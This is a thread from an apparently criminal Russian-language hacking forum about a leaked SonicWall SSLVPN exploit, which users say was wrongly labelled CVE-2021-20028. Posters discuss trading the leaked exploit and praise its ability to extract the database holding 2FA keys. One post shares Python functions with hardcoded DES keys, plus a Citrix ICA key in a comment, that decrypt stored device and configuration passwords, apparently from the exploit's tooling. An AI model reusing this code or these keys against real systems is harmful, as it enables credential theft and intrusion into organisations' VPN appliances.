• XSS.stack #1 – первый литературный журнал от юзеров форума

CVE-2021-20028 и SSLVPN

Отслеживать
Kelegen

Kelegen

TOXIC
КИДАЛА
Регистрация
17.08.2021
Сообщения
853
Реакции
481
Пожалуйста, обратите внимание, что пользователь заблокирован
Внесу немного ясности для наших заграничных друзей, а так же для нашего скромного сообщества где произошёл небольшой конфуз с эксплойтами.
Недавно, Вазафакой в твиттере был "слит" эксплойт, который западные друзья назвали "SQLi(CVE-2021-20028)". С какой это радости они прозвали его так - непонятно.
В связи с сегодняшними разборами полётов и помощи нескольких специалистов было подробно разобрано и выявлено, что эксплойт "слитый" Вазафакой - SonicWall SSLVPN.
В итоге, что мы имеем:
- SQLi(CVE-2021-20028) - остаётся невинным;

- SSLVPN - находится в полу-слитом состоянии("ходит по рукам")

Обращаюсь к западным друзьям и новостным блогам! Не вводите в заблуждение людей, не зная правды!
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Kelegen сказал(а):
Внесу немного ясности для наших заграничных друзей
Сильное выступление, стоило быть "нежнее" к нашим "друзьям" - они там уже статью готовят небось)
Ну а так, +150 к интересу у новокеков к инструменту имеем - более не проявляем такой сердечности!
Я может, только разобрался как python установить( а тут такой шум!
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Kelegen сказал(а):
нет
Так все таки wazawaka слил этот сплоит
п.с. Ну да, я же говорил что он его слил, в треде той крысы. Ток вопрос: он слил только сплоит или панель тоже?
 
Последнее редактирование:
vns10k сказал(а):
Так все таки wazawaka слил этот сплоит
п.с. Ну да, я же говорил что он его слил, в треде той крысы. Ток вопрос: он слил только сплоит или панель тоже?
1644495999200.png
 
Последнее редактирование:
vns10k сказал(а):
я им так и не пользовался,
но эксп отличный, хотя уже умирает. и жаль что не под все версии соника. но радует, что вытаскивает бд в которой хранятся ключи от 2фа
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Krypt0n сказал(а):
у него почти что 0дэй...
Бро не затмевай ситуацию - он щас создаст фейка и вновь попробует торговать
Ну или как минимум, как обиженное дитя просто сольет - собака на сене
 
Пожалуйста, обратите внимание, что пользователь заблокирован
ibenji сказал(а):
но эксп отличный, хотя уже умирает. и жаль что не под все версии соника. но радует, что вытаскивает бд в которой хранятся ключи от 2фа
у меня есть под все xD
Bastar сказал(а):
Бро не затмевай ситуацию - он щас создаст фейка и вновь попробует торговать
Ну или как минимум, как обиженное дитя просто сольет - собака на сене
он уже ничего не сможет )))
 
Пожалуйста, обратите внимание, что пользователь заблокирован
petroglyph сказал(а):
Посмотреть вложение 32200
eto ono?
Python: 
def decrypt_password(password):
    key = '2F4F2A86D552F880'
    password = bytes.fromhex(password)
    # ICA Citrix KEY: 98EF79BF23F2263E2046FB8EFC7F0000
    return DES.new(bytes.fromhex(key), DES.MODE_CBC, bytes.fromhex('0000000000000000')).decrypt(
        password).decode().replace('\x00', '')


def decrypt_cfg_password(password):
    key = '58D31CBAFBAD2952'
    password = bytes.fromhex(password)
    # ICA Citrix KEY: 98EF79BF23F2263E2046FB8EFC7F0000
    return DES.new(bytes.fromhex(key), DES.MODE_CBC, bytes.fromhex('0000000000000000')).decrypt(
        password).decode().replace('\x00', '')


def save_data(path, name, data):
    fd = open(path + '/' + name + '.json', 'w+')
    fd.write(json.dumps(data, indent = 4, sort_keys=True))
    fd.close()


def dict_factory(cursor, row):
    d = {}
    for idx, col in enumerate(cursor.description):
        d[col[0]] = row[idx]
    return d


def json_decode(string):
    try:
        return json.loads(string)
    except Exception:
        return None
 
admin


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх